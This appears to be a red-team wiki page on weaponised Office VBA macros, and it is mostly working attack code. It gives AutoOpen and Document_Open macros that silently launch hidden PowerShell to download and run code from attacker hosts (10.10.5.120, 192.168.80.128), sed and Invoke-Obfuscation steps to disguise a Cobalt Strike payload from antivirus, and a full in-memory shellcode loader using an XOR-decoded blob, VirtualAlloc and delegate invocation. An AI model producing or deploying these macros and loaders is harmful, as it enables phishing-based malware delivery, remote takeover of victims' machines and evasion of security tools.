Visual Basic (VBA Macros)

Simple Scenario

Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub
Sub AutoOpen()
  Dim proc As Object
  Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
  proc.Create "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub

Advanced Scenario

Attack Diagram

Listener & Payload

  • Generate cobalt strike 32bit PowerShell payload.

  • Run the following script on it:

# Functions
sed -i "s/func_get_proc_address/tryfun0/g" payload.ps1
sed -i "s/func_get_delegate_type/tryfun1/g" payload.ps1


# Variables
sed -i "s/\$var_module/\$tryvar0/g" payload.ps1
sed -i "s/\$var_procedure/\$tryvar1/g" payload.ps1
sed -i "s/\$var_unsafe_native_methods/\$tryvar2/g" payload.ps1
sed -i "s/\$var_gpa/\$tryvar3/g" payload.ps1
sed -i "s/\$var_parameters/\$tryvar4/g" payload.ps1
sed -i "s/\$var_type_builder/\$tryvar5/g" payload.ps1
sed -i "s/\$var_return_type/\$tryvar6/g" payload.ps1
sed -i "s/\$var_code/\$tryvar7/g" payload.ps1
sed -i "s/\$x/\$tryvar8/g" payload.ps1
sed -i "s/\$var_va/\$tryvar9/g" payload.ps1
sed -i "s/\$var_buffer/\$tryvar10/g" payload.ps1
sed -i "s/\$var_runme/\$tryvar11/g" payload.ps1

# Other
sed -i "s/\$DoIt/\$tryvar12/g" payload.ps1
sed -i "s/\$a/\$tryvar13/g" payload.ps1
sed -i "s/, 0,/, 0x0,/g" payload.ps1
sed -i "s/= 0;/= 0x0;/g" payload.ps1

  • Obfuscate the internal base64 payload with the Invoke Obfuscation tool:

git clone https://github.com/danielbohannon/Invoke-Obfuscation
pwsh
> Import-Module ./Invoke-Obfuscation/Invoke-Obfuscation.psd1
> Invoke-Obfuscation
> set ScriptBlock "Payload"
> compress
> 1
> copy

  • The full PowerShell code:

Set-StrictMode -Version 2

$tryvar12 = @'
function tryfun0 {
	Param ($tryvar0, $tryvar1)		
	$tryvar2 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$tryvar3 = $tryvar2.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $tryvar3.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($tryvar2.GetMethod('GetModuleHandle')).Invoke($null, @($tryvar0)))), $tryvar1))
}

function tryfun1 {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $tryvar4,
		[Parameter(Position = 1)] [Type] $tryvar6 = [Void]
	)

	$tryvar5 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$tryvar5.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $tryvar4).SetImplementationFlags('Runtime, Managed')
	$tryvar5.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $tryvar6, $tryvar4).SetImplementationFlags('Runtime, Managed')

	return $tryvar5.CreateType()
}

# Here
$new_me = (NEw-OBject  io.COMprEssIoN.DEfLAteStREAm([iO.MeMORYStReaM][cONVERT]::frombaSe64sTRiNG('LVLJFqo6EPwgFzKJuLgLhgBhiJIAAjsZVHBgVAhff+O7b1EnOd1Vdbr7lKh8ekj9JpAHC3xNu7dByPBlEHsTeJ6DOw17BfgcTzbnXGGgGNJn/sBPqHGiyTHe2lvgCr/HNuU/L4kvO/hFrDbue3s04NdQbaFvTflWH/73+acP8pnPE2juc8uU7Hg0f3wbfjWz1w8t+2/hV28dplPk7q3NpVQBR64Sr5jFSakut4W68YZwvBVT5MWgQ+RdejkfmA5aBTAtXGljrgRjVsY9EE+527E9oXgj8tuhhGi0eEzrb/fCRl7p9squXAVqIondYSHUv6dyuRSJORcJ8qidIov59p/zTbJ9IjJvUi5zGY1HJ5xS8XR5SZS+JR02cPGKbooTRx4uVO+8usq16/TTOl52cw5g+jcfIZiWzPtph4bLvN+677N5LjuzihjHHWvmpQw9rP2Gyk0hotknj52OQRqAgAfkETX7xyQfz+UjyQO/DmikcEX2Om7EpLvRR+e8t833WbyPG7ozthTbHaXp/qNfn6eNFu6onFvL07hXZfjCh3rsQukh14Z2XDkoZgF+gmP6wFYYF5kq7Pxz1J1CDvrmjQvVeeLIg7dDEweqwIvqAkMD+6kqYjfEUWKpKDdxkaq8GVt4vLCeqwrYCsDdNzQQsucHogqxG0WZGZqjby0tAlTq4Hbeft+zRKwYNZZDqeSarzuSk/N2NOp77e8MY9i3YjoqoLfdSPEgBrJB53a1th8lwG01COhp9KfsSdXZ1fPq5HdBrC0+vJ+WtdpG5aW8KrNOswNRB9f7ImQmlVdnk3RbDHlwwPZh2c+XUwTvEdocvj+w0d8lgT8cXsFZe2VKAfQzCBRh3KR8iDUcE+Tuh73/5BcvXab2yO5EkrCtLKUqry0ky0ldw435ncK0jjJjFpHz9JRhU1wCmo+ITBfYjFoJRT1fP2qrdvopGhpJdtOXMJzgpgEDQR63u2glyyk5Iw+uLM/c2EDBb0ow7e+iYbEczq8bq1G/3ryduR9ZTqlvQIp+WV2my6D9l1X++uz1oJbcvInHbC/5H1ec1gLcW2xgGFszl4OZIwCPjY9L/jz/+fMX') , [SYStEM.Io.COmpRESsioN.CompresSIOnmodE]::DECOmPrEsS) | % {NEw-OBject  syStEm.io.StReAMREaDer( $_,[TExT.eNcoDIng]::ASCiI )}| %{ $_.reaDToenD( ) } )

[Byte[]]$tryvar7 = [System.Convert]::FromBase64String($new_me)

for ($tryvar8 = 0x0; $tryvar8 -lt $tryvar7.Count; $tryvar8++) {
	$tryvar7[$tryvar8] = $tryvar7[$tryvar8] -bxor 35
}

$tryvar9 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((tryfun0 kernel32.dll VirtualAlloc), (tryfun1 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$tryvar10 = $tryvar9.Invoke([IntPtr]::Zero, $tryvar7.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($tryvar7, 0x0, $tryvar10, $tryvar7.length)

$tryvar11 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tryvar10, (tryfun1 @([IntPtr]) ([Void])))
$tryvar11.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($tryvar13) IEX $tryvar13 } -RunAs32 -Argument $tryvar12 | wait-job | Receive-Job
}
else {
	IEX $tryvar12
}

  • Encode it with Base64 encoding.

cat payload.ps1.new | base64 -w 0

  • Host the encoded string on your own web server.

python -m SimpleHTTPServer

Macro Code (VB)

Sub Auto_Open()
 DownloadFileFromURL
End Sub

Sub Document_Open()
 DownloadFileFromURL
End Sub

Sub DownloadFileFromURL()

Dim FileUrl As String
Dim objXmlHttpReq As Object
Dim objStream As Object

FileUrl = "http://192.168.80.128:8000/payload.ps1.new"

Set objXmlHttpReq = CreateObject("Microsoft.XMLHTTP")

objXmlHttpReq.Open "GET", FileUrl, False, "username", "password"
objXmlHttpReq.send

If objXmlHttpReq.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")

ChDir ActiveWorkbook.Path

objStream.Open
objStream.Type = 1
objStream.Write objXmlHttpReq.responseBody
objStream.SaveToFile CurDir() & "\bla4.ps1", 2
objStream.Close

End If

Shell ("c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -W Hidden .\bla4.ps1")

End Sub
PreviousHTML Application (HTA)NextPassword Spraying

Last updated